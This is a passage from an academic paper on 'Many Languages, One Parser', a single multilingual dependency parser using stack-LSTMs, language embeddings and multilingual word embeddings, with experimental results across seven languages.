Comput. Sci., DOI 10.7717/peerj-cs.89 19/19 https://peerj.com http://dx.doi.org/10.1145/509506.509517 http://dx.doi.org/10.1109/TIT.2002.807285 http://dx.doi.org/10.1109/JPROC.2010.2093850 http://dx.doi.org/10.1109/JSAC.2012.120207 http://dx.doi.org/10.7717/peerj-cs.89 work_4zamv3kd6bhadgzzpkitxfvryi ---- Many Languages, One Parser Waleed Ammar♦ George Mulcaire♥ Miguel Ballesteros♠♦ Chris Dyer♦ Noah A. Smith♥ ♦School of Computer Science, Carnegie Mellon University, Pittsburgh, PA, USA ♥Computer Science & Engineering, University of Washington, Seattle, WA, USA ♠NLP Group, Pompeu Fabra University, Barcelona, Spain wammar@cs.cmu.edu, gmulc@uw.edu, miguel.ballesteros@upf.edu cdyer@cs.cmu.edu, nasmith@cs.washington.edu Abstract We train one multilingual model for depen- dency parsing and use it to parse sentences in several languages. The parsing model uses (i) multilingual word clusters and em- beddings; (ii) token-level language informa- tion; and (iii) language-specific features (fine- grained POS tags). This input representation enables the parser not only to parse effec- tively in multiple languages, but also to gener- alize across languages based on linguistic uni- versals and typological similarities, making it more effective to learn from limited annota- tions. Our parser’s performance compares fa- vorably to strong baselines in a range of data scenarios, including when the target language has a large treebank, a small treebank, or no treebank for training. 1 Introduction Developing tools for processing many languages has long been an important goal in NLP (Rösner, 1988; Heid and Raab, 1989),1 but it was only when statistical methods became standard that massively multilingual NLP became economical. The main- stream approach for multilingual NLP is to design language-specific models. For each language of in- terest, the resources necessary for training the model are obtained (or created), and separate parameters are fit for each language separately. This approach is simple and grants the flexibility of customizing 1As of 2007, the total number of native speakers of the hundred most popular languages only accounts for 85% of the world’s population (Wikipedia, 2016). the model and features to the needs of each lan- guage, but it is suboptimal for theoretical and prac- tical reasons. Theoretically, the study of linguistic typology tells us that many languages share mor- phological, phonological, and syntactic phenomena (Bender, 2011); therefore, the mainstream approach misses an opportunity to exploit relevant supervi- sion from typologically related languages. Practi- cally, it is inconvenient to deploy or distribute NLP tools that are customized for many different lan- guages because, for each language of interest, we need to configure, train, tune, monitor, and occasion- ally update the model. Furthermore, code-switching or code-mixing (mixing more than one language in the same discourse), which is pervasive in some gen- res, in particular social media, presents a challenge for monolingually-trained NLP models (Barman et al., 2014).2 In parsing, the availability of homogeneous syn- tactic dependency annotations in many languages (McDonald et al., 2013; Nivre et al., 2015b; Agić et al., 2015; Nivre et al., 2015a) has created an opportunity to develop a parser that is capable of parsing sentences in multiple languages, address- ing these theoretical and practical concerns.3 A multilingual parser can potentially replace an array of language-specific monolingually-trained parsers 2While our parser can be used to parse input with code- switching, we have not evaluated this capability due to the lack of appropriate data. 3Although multilingual dependency treebanks have been available for a decade via the 2006 and 2007 CoNLL shared tasks (Buchholz and Marsi, 2006; Nivre et al., 2007), the tree- bank of each language was annotated independently and with its own annotation conventions. 431 Transactions of the Association for Computational Linguistics, vol. 4, pp. 431–444, 2016. Action Editor: David Chiang. Submission batch: 3/2016; Revision batch: 5/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. (for languages with a large treebank). The same approach has been used in low-resource scenarios (with no treebank or a small treebank in the target language), where indirect supervision from auxiliary languages improves the parsing quality (Cohen et al., 2011; McDonald et al., 2011; Zhang and Barzi- lay, 2015; Duong et al., 2015a; Duong et al., 2015b; Guo et al., 2016), but these models may sacrifice ac- curacy on source languages with a large treebank. In this paper, we describe a model that works well for both low-resource and high-resource scenarios. We propose a parsing architecture that takes as in- put sentences in several languages,4 optionally pre- dicting the part-of-speech (POS) tags and input lan- guage. The parser is trained on the union of avail- able universal dependency annotations in different languages. Our approach integrates and critically relies on several recent developments related to de- pendency parsing: universal POS tagsets (Petrov et al., 2012), cross-lingual word clusters (Täckström et al., 2012), selective sharing (Naseem et al., 2012), universal dependency annotations (McDonald et al., 2013; Nivre et al., 2015b; Agić et al., 2015; Nivre et al., 2015a), advances in neural network architec- tures (Chen and Manning, 2014; Dyer et al., 2015), and multilingual word embeddings (Gardner et al., 2015; Guo et al., 2016; Ammar et al., 2016). We show that our parser compares favorably to strong baselines trained on the same treebanks in three data scenarios: when the target language has a large tree- bank (Table 3), a small treebank (Table 7), or no treebank (Table 8). Our parser is publicly available.5 2 Overview Our goal is to train a dependency parser for a set of target languages Lt, given universal dependency annotations in a set of source languages Ls. Ide- ally, we would like to have training data in all tar- get languages (i.e., Lt ⊆ Ls), but we are also inter- ested in the case where the sets of source and target languages are disjoint (i.e., Lt ∩ Ls = ∅). When all languages in Lt have a large treebank, the main- stream approach has been to train one monolingual parser per target language and route sentences of a 4We discuss data requirements in the next section. 5https://github.com/clab/ language-universal-parser given language to the corresponding parser at test time. In contrast, our approach is to train one pars- ing model with the union of treebanks in Ls, then use this single trained model to parse text in any lan- guage in Lt, hence the name “Many Languages, One Parser” (MALOPA). MALOPA strikes a balance be- tween: (1) enabling cross-lingual model transfer via language-invariant input representations; i.e., coarse POS tags, multilingual word embeddings and mul- tilingual word clusters, and (2) tweaking the be- havior of the parser depending on the current input language via language-specific representations; i.e., fine-grained POS tags and language embeddings. In addition to universal dependency annotations in source languages (see Table 1), we use the follow- ing data resources for each language in L = Lt∪Ls: • universal POS annotations for training a POS tag- ger,6 • a bilingual dictionary with another language in L for adding cross-lingual lexical information,7 • language typology information,8 • language-specific POS annotations,9 and • a monolingual corpus.10 Novel contributions of this paper include: (i) us- ing one parser instead of an array of monolingually- trained parsers without sacrificing accuracy on lan- guages with a large treebank, (ii) an effective neural network architecture for using language embeddings to improve multilingual parsing, and (iii) a study of how automatic language identification affects the performance of a multilingual dependency parser. While not the primary focus of this paper, we also show that a variant of our parser outperforms pre- vious work on multi-source cross-lingual parsing in 6See §3.6 for details. 7Our best results make use of this resource. We require that all languages in L are (transitively) connected. The bilingual dictionaries we used are based on unsupervised word align- ments of parallel corpora, as described in Guo et al. (2016). See §3.3 for details. 8See §3.4 for details. 9Our best results make use of this resource. See §3.5 for details. 10This is only used for training word embeddings with ‘mul- tiCCA,’ ‘multiCluster’ and ‘translation-invariance’ methods in Table 6. We do not use this resource when we compare to pre- vious work. 432 https://github.com/clab/language-universal-parser https://github.com/clab/language-universal-parser German (de) English (en) Spanish (es) French (fr) Italian (it) Portuguese (pt) Swedish (sv) UDT 2 train 14118 (264906) 39832 (950028) 14138 (375180) 14511 (351233) 6389 (149145) 9600 (239012) 4447 (66631) dev. 801 (12215) 1703 (40117) 1579 (40950) 1620 (38328) 399 (9541) 1211 (29873) 493 (9312) test 1001 (16339) 2416 (56684) 300 (8295) 300 (6950) 400 (9187) 1205 (29438) 1219 (20376) UD 1.2 train 14118 (269626) 12543 (204586) 14187 (382436) 14552 (355811) 11699 (249307) 8800 (201845) 4303 (66645) dev. 799 (12512) 2002 (25148) 1552 (41975) 1596 (39869) 489 (11656) 271 (4833) 504 (9797) test 977 (16537) 2077 (25096) 274 (8128) 298 (7210) 489 (11719) 288 (5867) 1219 (20377) tags - 50 - - 36 866 134 Table 1: Number of sentences (tokens) in each treebank split in Universal Dependency Treebanks (UDT) version 2.0 and Universal Dependencies (UD) version 1.2 for the languages we experiment with. The last row gives the number of unique language-specific fine-grained POS tags used in a treebank. low resource scenarios, where languages in Lt have a small treebank (see Table 7) or where Lt ∩Ls = ∅ (see Table 8). In the small treebank setup with 3,000 token annotations, we show that our parser consis- tently outperforms a strong monolingual baseline with 5.7 absolute LAS (labeled attachment score) points per language, on average. 3 Parsing Model Recent advances suggest that recurrent neural net- works, especially long short-term memory (LSTM) architectures, are capable of learning useful repre- sentations for modeling problems of sequential na- ture (Graves et al., 2013; Sutskever et al., 2014). In this section, we describe our language-universal parser, which extends the stack LSTM (S-LSTM) parser of Dyer et al. (2015). 3.1 Transition-based Parsing with S-LSTMs This section briefly reviews Dyer et al.’s S-LSTM parser, which we modify in the following sections. The core parser can be understood as the sequential manipulation of three data structures: • a buffer (from which we read the token sequence), • a stack (which contains partially-built parse trees), and • a list of actions previously taken by the parser. The parser uses the arc-standard transition system (Nivre, 2004).11 At each timestep t, a transition ac- tion is applied that alters these data structures ac- cording to Table 2. 11In a preprocessing step, we transform nonprojective trees in the training treebanks to pseudo-projective trees using the “baseline” scheme in (Nivre and Nilsson, 2005). We evaluate against the original nonprojective test set. Along with the discrete transitions of the arc- standard system, the parser computes vector repre- sentations for the buffer, stack and list of actions at time step t denoted bt, st, and at, respectively.12 The parser state at time t is given by: pt = max{0,W[st; bt; at] + Wbias} (1) where the matrix W and the vector Wbias are learned parameters. The matrix W is multiplied by the vector [st; bt; at] created by the concatenation of st,bt,at. The parser state pt is then used to define a categorical distribution over possible next actions z:13 p(z | pt) = exp ( g>z pt + qz ) ∑ z′ exp ( g>z′pt + qz′ ) (2) where gz and qz are parameters associated with ac- tion z. The selected action is then used to update the buffer, stack and list of actions, and to compute bt+1, st+1 and at+1 accordingly. The model is trained to maximize the log- likelihood of correct actions. At test time, the parser greedily chooses the most probable action in every time step until a complete parse tree is produced. The following sections describe our extensions of the core parser. More details about the core parser can be found in Dyer et al. (2015). 3.2 Token Representations The vector representations of input tokens feed into the stack-LSTM modules of the buffer and the stack. 12A stack-LSTM module is used to compute the vector rep- resentation for each data structure, as detailed in Dyer et al. (2015). 13The total number of actions is 1+2× the number of unique dependency labels in the treebank used for training, but we only consider actions which meet the arc-standard preconditions in Fig. 2. 433 Stackt Buffert Action Dependency Stackt+1 Buffert+1 u,v,S B REDUCE-RIGHT(r) u r→ v u,S B u,v,S B REDUCE-LEFT(r) u r← v v,S B S u,B SHIFT — u,S B Table 2: Parser transitions indicating the action applied to the stack and buffer at time t and the resulting stack and buffer at time t + 1. For monolingual parsing, we represent each token by concatenating the following vectors: • a fixed, pretrained embedding of the word type, • a learned embedding of the word type, • a learned embedding of the Brown cluster, • a learned embedding of the fine-grained POS tag, • a learned embedding of the coarse POS tag. For multilingual parsing with MALOPA, we start with a simple delexicalized model where the token representation only consists of learned embeddings of coarse POS tags, which are shared across all lan- guages to enable model transfer. In the following subsections, we enhance the token representation in MALOPA to include lexical embeddings, language embeddings, and fine-grained POS embeddings. 3.3 Lexical Embeddings Previous work has shown that sacrificing lexical fea- tures amounts to a substantial decrease in the perfor- mance of a dependency parser (Cohen et al., 2011; Täckström et al., 2012; Tiedemann, 2015; Guo et al., 2015). Therefore, we extend the token representa- tion in MALOPA by concatenating learned embed- dings of multilingual word clusters, and pretrained multilingual embeddings of word types. Multilingual Brown clusters. Before training the parser, we estimate Brown clusters of English words and project them via word alignments to words in other languages. This is similar to the ‘projected clusters’ method in Täckström et al. (2012). To go from Brown clusters to embeddings, we ignore the hierarchy within Brown clusters and assign a unique parameter vector to each cluster. Multilingual word embeddings. We also use Guo et al.’s (2016) ‘robust projection’ method to pre- train multilingual word embeddings. The first step in ‘robust projection’ is to learn embeddings for En- glish words using the skip-gram model (Mikolov et al., 2013). Then, we compute an embedding of non- English words as the weighted average of English word embeddings, using word alignment probabili- ties as weights. The last step computes an embed- ding of non-English words which are not aligned to any English words by averaging the embeddings of all words within an edit distance of 1 in the same language. We experiment with two other methods— ‘multiCCA’ and ‘multiCluster,’ both proposed by Ammar et al. (2016)—for pretraining multilingual word embeddings in §4.1. ‘MultiCCA’ uses a lin- ear operator to project pretrained monolingual em- beddings in each language (except English) to the vector space of pretrained English word embed- dings, while ‘multiCluster’ uses the same embed- ding for translationally-equivalent words in different languages. The results in Table 6 illustrate that the three methods perform similarly on this task. 3.4 Language Embeddings While many languages, especially ones that belong to the same family, exhibit some similar syntac- tic phenomena (e.g., all languages have subjects, verbs, and objects), substantial syntactic differences abound. Some of these differences are easy to char- acterize (e.g., subject-verb-object vs. verb-subject- object, prepositions vs. postpositions, adjective- noun vs. noun-adjective), while others are sub- tle (e.g., number and positions of negation mor- phemes). It is not at all clear how to translate de- scriptive facts about a language’s syntax into fea- tures for a parser. Consequently, training a language-universal parser on treebanks in multiple source languages requires caution. While exposing the parser to a diverse set of syntactic patterns across many lan- guages has the potential to improve its performance 434 in each, dependency annotations in one language will, in some ways, contradict those in typologically different languages. For instance, consider a context where the next word on the buffer is a noun, and the top word on the stack is an adjective, followed by a noun. Tree- banks of languages where postpositive adjectives are typical (e.g., French) will often teach the parser to predict REDUCE-LEFT, while those of languages where prepositive adjectives are more typical (e.g., English) will teach the parser to predict SHIFT. Inspired by Naseem et al. (2012), we address this problem by informing the parser about the input lan- guage it is currently parsing. Let l be the input vector representation of a particular language. We consider three definitions for l:14 • one-hot encoding of the language ID, • one-hot encoding of individual word-order prop- erties,15 and • averaged one-hot encoding of WALS typological properties (including word-order properties).16 It is worth noting that the first definition (language ID) turns out to work best in our experiments. We use a hidden layer with tanh nonlinearity to compute the language embedding l′ as: l′ = tanh(Ll + Lbias) where the matrix L and the vector Lbias are addi- tional model parameters. We modify the parsing ar- chitecture as follows: • include l′ in the token representation (which feeds into the stack-LSTM modules of the buffer and the stack as described in §3.1), 14The files which contain these definitions are available at https://github.com/clab/ language-universal-parser/tree/master/ typological_properties. 15The World Atlas of Language Structures (WALS; Dryer and Haspelmath, 2013) is an online portal documenting typo- logical properties of 2,679 languages (as of July 2015). We use the same set of WALS features used by Zhang and Barzilay (2015), namely 82A (order of subject and verb), 83A (order of object and verb), 85A (order of adposition and noun phrase), 86A (order of genitive and noun), and 87A (order of adjective and noun). 16Some WALS features are not annotated for all languages. Therefore, we use the average value of all languages in the same genus. We rescale all values to be in the range [−1,1]. • include l′ in the action vector representation (which feeds into the stack-LSTM module that represents previous actions as described in §3.1), and • redefine the parser state at time t as pt = max{0,W[st; bt; at; l′] + Wbias}. Intuitively, the first two modifications allow the input language to influence the vector representation of the stack, the buffer and the list of actions. The third modification allows the input language to in- fluence the parser state which in turn is used to pre- dict the next action. In preliminary experiments, we found that adding the language embeddings at the token and action level is important. We also experi- mented with computing more complex functions of (st,bt,at, l′) to define the parser state, but they did not help. 3.5 Fine-grained POS Tag Embeddings Tiedemann (2015) shows that omitting fine-grained POS tags significantly hurts the performance of a de- pendency parser. However, those fine-grained POS tagsets are defined monolingually and are only avail- able for a subset of the languages with universal de- pendency treebanks. We extend the token representation to include a fine-grained POS embedding (in addition to the coarse POS embedding). We stochastically dropout the fine-grained POS embedding for each token with 50% probability (Srivastava et al., 2014) so that the parser can make use of fine-grained POS tags when available but stay reliable when the fine-grained POS tags are missing. 3.6 Predicting POS Tags The model discussed thus far conditions on the POS tags of words in the input sentence. However, gold POS tags may not be available in real applications (e.g., parsing the web). Here, we describe two mod- ifications to (i) model both POS tagging and depen- dency parsing, and (ii) increase the robustness of the parser to incorrect POS predictions. Tagging model. Let x1, . . . ,xn, y1, . . . ,yn, z1, . . . ,z2n be the sequence of words, POS tags, and parsing actions, respectively, for a sentence of length n. We define the joint distribution of a POS 435 https://github.com/clab/language-universal-parser/tree/master/typological_properties https://github.com/clab/language-universal-parser/tree/master/typological_properties https://github.com/clab/language-universal-parser/tree/master/typological_properties tag sequence and parsing actions given a sequence of words as follows: p(y1, . . . ,yn,z1, . . . ,z2n | x1, . . . ,xn) = n∏ i=1 p(yi | x1, . . . ,xn) × 2n∏ j=1 p(zj | x1, . . . ,xn,y1, . . . ,yn,z1, . . . ,zj−1) where p(zj | . . .) is defined in Eq. 2, and p(yi | x1, . . . ,xn) uses a bidirectional LSTM (Graves et al., 2013). Huang et al. (2015) show that the perfor- mance of a bidirectional LSTM POS tagger is on par with a conditional random field tagger. We use slightly different token representations for tagging and parsing in the same model. For tag- ging, we construct the token representation by con- catenating the embeddings of the word type (pre- trained), the Brown cluster and the input language. This token representation feeds into the bidirectional LSTM, followed by a softmax layer (at each posi- tion) which defines a categorical distribution over possible POS tags. For parsing, we construct the to- ken representation by further concatenating the em- beddings of predicted POS tags. This token repre- sentation feeds into the stack-LSTM modules of the buffer and stack components of the transition-based parser. This multi-task learning setup enables us to predict both POS tags and dependency trees in the same model. We note that pretrained word embed- dings, cluster embeddings and language embeddings are shared for tagging and parsing. Block dropout. We use an independently devel- oped variant of word dropout (Iyyer et al., 2015), which we call block dropout. The token representa- tion used for parsing includes the embedding of pre- dicted POS tags, which may be incorrect. We intro- duce another modification which makes the parser more robust to incorrect POS tag predictions, by stochastically zeroing out the entire embedding of the POS tag. While training the parser, we replace the POS embedding vector e with another vector (of the same dimensionality) stochastically computed as: e′ = (1 − b)/µ × e, where b ∈ {0,1} is a Bernoulli-distributed random variable with parame- ter µ which is initialized to 1.0 (i.e., always dropout, setting b = 1,e′ = 0), and is dynamically updated to match the error rate of the POS tagger on the de- velopment set. At test time, we never dropout the predicted POS embedding, i.e., e′ = e. Intuitively, this method extends the dropout method (Srivastava et al., 2014) to address structured noise in the input layer. 4 Experiments In this section, we evaluate the MALOPA approach in three data scenarios: when the target language has a large treebank (Table 3), a small treebank (Table 7) or no treebank (Table 8). Data. For experiments where the target language has a large treebank, we use the standard data splits for German (de), English (en), Spanish (es), French (fr), Italian (it), Portuguese (pt) and Swedish (sv) in the latest release (version 1.2) of Universal Depen- dencies (Nivre et al., 2015a), and experiment with both gold and predicted POS tags. For experiments where the target language has no treebank, we use the standard splits for these languages in the older universal dependency treebanks v2.0 (McDonald et al., 2013) and use gold POS tags, following the base- lines (Zhang and Barzilay, 2015; Guo et al., 2016). Table 1 gives the number of sentences and words annotated for each language in both versions. In a preprocessing step, we lowercase all tokens and re- move multi-word annotations and language-specific dependency relations. We use the same multilingual Brown clusters and multilingual embeddings of Guo et al. (2016), kindly provided by the authors. Optimization. We follow Dyer et al. (2015) in parameter initialization and optimization.17 How- ever, when training the parser on multiple languages 17We use stochastic gradient updates with an initial learn- ing rate of η0 = 0.1 in epoch #0, update the learning rate in following epochs as ηt = η0/(1 + 0.1t). We clip the `2 norm of the gradient to avoid “exploding” gradients. Unla- beled attachment score (UAS) on the development set deter- mines early stopping. Parameters are initialized with uniform samples in ± √ 6/(r + c) where r and c are the sizes of the previous and following layer in the nueral network (Glorot and Bengio, 2010). The standard deviations of the labeled attach- ment score (LAS) due to random initialization in individual tar- get languages are 0.36 (de), 0.40 (en), 0.37 (es), 0.46 (fr), 0.47 (it), 0.41 (pt) and 0.24 (sv). The standard deviation of the aver- age LAS scores across languages is 0.17. 436 LAS target language average de en es fr it pt sv monolingual 79.3 85.9 83.7 81.7 88.7 85.7 83.5 84.0 MALOPA 70.4 69.3 72.4 71.1 78.0 74.1 65.4 71.5 +lexical 76.7 82.0 82.7 81.2 87.6 82.1 81.2 81.9 +language ID 78.6 84.2 83.4 82.4 89.1 84.2 82.6 83.5 +fine-grained POS 78.9 85.4 84.3 82.4 89.0 86.2 84.5 84.3 Table 3: Dependency parsing: labeled attachment scores (LAS) for monolingually-trained parsers and MALOPA in the fully supervised scenario where Lt = Ls. Note that we use the universal dependencies verson 1.2 which only includes annotations for ∼13,000 English sentences, which explains the relatively low scores in English. When we instead use the universal dependency treebanks version 2.0 which includes annotations for ∼40,000 English sentences (originally from the English Penn Treebank), we achieve UAS score 93.0 and LAS score 91.5. in MALOPA, instead of updating the parameters with the gradient of individual sentences, we use mini-batch updates which include one sentence sam- pled uniformly (without replacement) from each language’s treebank, until all sentences in the small- est treebank are used (which concludes an epoch). We repeat the same process in following epochs. We found this to help prevent one source language with a larger treebank (e.g., German) from dominat- ing parameter updates at the expense of other source languages with a smaller treebank (e.g., Swedish). 4.1 Target Languages with a Treebank (Lt = Ls) Here, we evaluate our MALOPA parser when the target language has a treebank. Baseline. For each target language, the strong baseline we use is a monolingually-trained S-LSTM parser with a token representation which concate- nates: pretrained word embeddings (50 dimen- sions),18 learned word embeddings (50 dimensions), coarse (universal) POS tag embeddings (12 dimen- sions), fine-grained (language-specific, when avail- able) POS tag embeddings (12 dimensions), and em- beddings of Brown clusters (12 dimensions), and uses a two-layer S-LSTM for each of the stack, the buffer and the list of actions. We independently train one baseline parser for each target language, and share no model parameters. This baseline, denoted 18These embeddings are treated as fixed inputs to the parser, and are not optimized towards the parsing objective. We use the same embeddings used in Guo et al. (2016). ‘monolingual’ in Tables 3 and 7, achieves UAS score 93.0 and LAS score 91.5 when trained on the En- glish Penn Treebank, which is comparable to Dyer et al. (2015). MALOPA. We train MALOPA on the concante- nation of training sections of all seven languages. To balance the development set, we only concatenate the first 300 sentences of each language’s develop- ment section. Token representations. The first MAL- OPA parser we evaluate uses only coarse POS embeddings to construct the token representation.19 As shown in Table 3, this parser consistently underperforms the monolingual baselines, with a gap of 12.5 LAS points on average. Augmenting the token representation with lexical embeddings to the token representation (both mul- tilingual word clusters and pretrained multilingual word embeddings, as described in §3.3) substan- tially improves the performance of MALOPA, re- covering 83% of the gap in average performance. We experimented with three ways to include language information in the token representation, namely: ‘language ID’, ‘word order’ and ‘full ty- pology’ (see §3.4 for details), and found all three to improve the performance of MALOPA giving LAS scores 83.5, 83.2 and 82.5, respectively. It is noteworthy that the model benefits more from lan- 19We use the same number of dimensions for the coarse POS embeddings as in the monolingual baselines. The same applies to all other types of embeddings used in MALOPA. 437 Recall % left right root short long nsubj* dobj conj *comp case *mod monolingual 89.9 95.2 86.4 92.9 81.1 77.3 75.5 66.0 45.6 93.3 77.0 MALOPA 85.4 93.3 80.2 91.2 73.3 57.3 62.7 64.2 34.0 90.7 69.6 +lexical 89.9 93.8 84.5 92.6 78.6 73.3 73.4 66.9 35.3 91.6 75.3 +language ID 89.1 94.7 86.6 93.2 81.4 74.7 73.0 71.2 48.2 92.8 76.3 +fine-grained POS 89.5 95.7 87.8 93.6 82.0 74.7 74.9 69.7 46.0 93.3 76.3 Table 4: Recall of some classes of dependency attachments/relations in German. LAS target language average language ID coarse POS de en es fr it pt sv gold gold 78.6 84.2 83.4 82.4 89.1 84.2 82.6 83.5 predicted gold 78.5 80.2 83.4 82.1 88.9 83.9 82.5 82.7 gold predicted 71.2 79.9 80.5 78.5 85.0 78.4 75.5 78.4 predicted predicted 70.8 74.1 80.5 78.2 84.7 77.1 75.5 77.2 Table 5: Effect of automatically predicting language ID and POS tags with MALOPA on LAS scores. guage ID than from typological properties. Using ‘language ID,’ we recover another 12% of the origi- nal gap. Finally, the best configuration of MALOPA adds fine-grained POS embeddings to the token represen- tation.20 Surprisingly, adding fine-grained POS em- beddings improves the performance even for some languages where fine-grained POS tags are not avail- able (e.g., Spanish). This parser outperforms the monolingual baseline in five out of seven target lan- guages, and wins on average by 0.3 LAS points. We emphasize that this model is only trained once on all languages, and the same model is used to parse the test set of each language, which simplifies the distribution or deployment of multilingual parsing software. Qualitative analysis. To gain a better understand- ing of the model behavior, we analyze certain classes of dependency attachments/relations in Ger- man, which has notably flexible word order, in Ta- ble 4. We consider the recall of left attachments (where the head word precedes the dependent word in the sentence), right attachments, root attach- ments, short-attachments (with distance = 1), long- attachments (with distance > 6), as well as the fol- lowing relation groups: nsubj* (nominal subjects: 20Fine-grained POS tags were only available for English, Italian, Portuguese and Swedish. Other languages reuse the coarse POS tags as fine-grained tags instead of padding the ex- tra dimensions in the token representation with zeros. nsubj, nsubjpass), dobj (direct object: dobj), conj (conjunct: conj), *comp (clausal comple- ments: ccomp, xcomp), case (clitics and adposi- tions: case), *mod (modifiers of a noun: nmod, nummod, amod, appos), neg (negation modifier: neg).21 Findings. We found that each of the three im- provements (lexical embeddings, language embed- dings and fine-grained POS embeddings) tends to improve recall for most classes. MALOPA un- derperforms (compared to the monolingual base- line) in some classes: nominal subjects, direct ob- jects and modifiers of a noun. Nevertheless, MAL- OPA outperforms the baseline in some important classes such as: root, long attachments and conjunc- tions. Predicting language IDs and POS tags. In Ta- ble 3, we assume that both gold language ID of the input language and gold POS tags are given at test time. However, this assumption is not realistic in practical applications. Here, we quantify the degra- dation in parsing accuracy when language ID and POS tags are only given at training time, but must be predicted at test time. We do not use fine-grained 21For each group, we report recall of both the attach- ment and relation weighted by the number of instances in the gold annotation. A detailed description of each relation can be found at http://universaldependencies.org/ u/dep/index.html 438 http://universaldependencies.org/u/dep/index.html http://universaldependencies.org/u/dep/index.html POS tags in these experiments because some lan- guages use a very large fine-grained POS tag set (e.g., 866 unique tags in Portuguese). In order to predict language ID, we use the langid.py library (Lui and Baldwin, 2012)22 and classify individual sentences in the test sets to one of the seven languages of interest, using the default models included in the library. The macro aver- age language ID prediction accuracy on the test set across sentences is 94.7%. In order to predict POS tags, we use the model described in §3.6 with both input and hidden LSTM dimensions of 60, and with block dropout. The macro average accuracy of the POS tagger is 93.3%. Table 5 summarizes the four configurations: {gold language ID, predicted lan- guage ID} × {gold POS tags, predicted POS tags}. The performance of the parser suffers mildly (–0.8 LAS points) when using predicted language IDs, but more (–5.1 LAS points) when using predicted POS tags. As an alternative approach to predicting POS tags, we trained the Stanford POS tagger, for each target language, on the coarse POS tag annota- tions in the training section of the universal depen- dency treebanks,23 then replaced the gold POS tags in the test set of each language with predictions of the monolingual tagger. The resulting degradation in parsing performance between gold vs. predicted POS tags is –6.0 LAS points (on average, compared to a degradation of –5.1 LAS points in Table 5). The disparity in parsing results with gold vs. predicted POS tags is an important open problem, and has been previously discussed by Tiedemann (2015). The predicted POS results in Table 5 use block dropout. Without using block dropout, we lose an extra 0.2 LAS points in both configurations using predicted POS tags. Different multilingual embeddings. Several methods have been proposed for pretraining mul- tilingual word embeddings. We compare three of them: • multiCCA (Ammar et al., 2016) uses a lin- 22https://github.com/saffsd/langid.py 23We used version 3.6.0 of the Stanford POS tag- ger, with the following pre-packaged configuration files: german-fast-caseless.tagger.props (de), english-caseless- left3words-distsim.tagger.props (en), spanish.tagger.props (es), french.tagger.props (fr). We reused french.tagger.props for (it, pt, sv). multilingual embeddings UAS LAS multiCluster 87.7 84.1 multiCCA 87.8 84.4 robust projection 87.8 84.2 Table 6: Effect of multilingual embedding estima- tion method on the multilingual parsing with MAL- OPA. UAS and LAS scores are macro-averaged across seven target languages. ear operator to project pretrained monolingual embeddings in each language (except English) to the vector space of pretrained English word embeddings. • multiCluster (Ammar et al., 2016) uses the same embedding for translationally-equivalent words in different languages. • robust projection (Guo et al., 2015) first pre- trains monolingual English word embeddings, then defines the embedding of a non-English word as the weighted average embedding of English words aligned to the non-English words (in a parallel corpus). The embedding of a non-English word which is not aligned to any English words is defined as the average embed- ding of words with a unit edit distance in the same language (e.g., ‘playz’ is the average of ‘plays’ and ‘play’).24 All embeddings are trained on the same data and use the same number of dimensions (100).25 Table 6 il- lustrates that the three methods perform similarly on this task. Aside from Table 6, in this paper, we ex- clusively use the robust projection multilingual em- beddings trained in Guo et al. (2016).26 The “ro- bust projection” result in Table 6 (which uses 100 dimensions) is comparable to the last row in Table 3 (which uses 50 dimensions). 24Our implementation of this method can be found at https://github.com/gmulcaire/ average-embeddings. 25We share the embedding files at https://github. com/clab/language-universal-parser/tree/ master/pretrained_embeddings. 26The embeddings were kindly provided by the authors of Guo et al. (2016) at https://drive.google.com/ file/d/0B1z04ix6jD_DY3lMN2Ntdy02NFU/view 439 https://github.com/saffsd/langid.py https://github.com/gmulcaire/average-embeddings https://github.com/gmulcaire/average-embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://drive.google.com/file/d/0B1z04ix6jD_DY3lMN2Ntdy02NFU/view https://drive.google.com/file/d/0B1z04ix6jD_DY3lMN2Ntdy02NFU/view LAS target language de es fr it sv monolingual 58.0 64.7 63.0 68.7 57.6 Duong et al. 61.8 70.5 67.2 71.3 62.5 MALOPA 63.4 70.5 69.1 74.1 63.4 Table 7: Small (3,000 token) target treebank setting: language-universal dependency parser performance. Small target treebank. Duong et al. (2015b) con- sidered a setup where the target language has a small treebank of ∼3,000 tokens, and the source language (English) has a large treebank of ∼205,000 tokens. The parser proposed in Duong et al. (2015b) is a neural network parser based on Chen and Manning (2014), which shares most of the parameters be- tween English and the target language, and uses an `2 regularizer to tie the lexical embeddings of translationally-equivalent words. While not the pri- mary focus of this paper,27 we compare our pro- posed method to that of Duong et al. (2015b) on five target languages for which multilingual Brown clusters are available from Guo et al. (2016). For each target language, we train the parser on the En- glish training data in the UD version 1.0 corpus (Nivre et al., 2015b) and a small treebank in the target language.28 Following Duong et al. (2015b), in this setup, we only use gold coarse POS tags, we do not use any development data in the target languages (we use the English development set in- stead), and we subsample the English training data in each epoch to the same number of sentences in the target language. We use the same hyperparameters specified before for the single MALOPA parser and each of the monolingual baselines. Table 7 shows that our method outperforms Duong et al. (2015b) by 1.4 LAS points on average. Our method consis- tently outperforms the monolingual baselines in this 27The setup cost involved in recruiting linguists, developing and revising annotation guidelines to annotate a new language ought to be higher than the cost of annotating 3,000 tokens. Af- ter investing much resources in a language, we believe it is un- realistic to stop the annotation effort after only 3,000 tokens. 28We thank Long Duong for sharing the processed, subsampled training corpora in each target language at https://github.com/longdt219/universal_ dependency_parser/tree/master/data/ universal-dep/universal-dependencies-1.0. setup, with an average improvement of 5.7 absolute LAS points. 4.2 Target Languages without a Treebank (Lt ∩Ls = ∅) McDonald et al. (2011) established that, when no treebank annotations are available in the target lan- guage, training on multiple source languages out- performs training on one (i.e., multi-source model transfer outperforms single-source model transfer). In this section, we evaluate the performance of our parser in this setup. We use two strong baseline multi-source model transfer parsers with no super- vision in the target language: • Zhang and Barzilay (2015) is a graph-based arc- factored parsing model with a tensor-based scor- ing function. It takes typological properties of a language as input. We compare to the best reported configuration (i.e., the column titled “OURS” in Table 5 of Zhang and Barzilay, 2015). • Guo et al. (2016) is a transition-based neural- network parsing model based on Chen and Man- ning (2014). It uses a multilingual embeddings and Brown clusters as lexical features. We com- pare to the best reported configuration (i.e., the column titled “MULTI-PROJ” in Table 1 of Guo et al., 2016). Following Guo et al. (2016), for each target lan- guage, we train the parser on six other languages in the Google universal dependency treebanks version 2.029 (de, en, es, fr, it, pt, sv, excluding whichever is the target language), 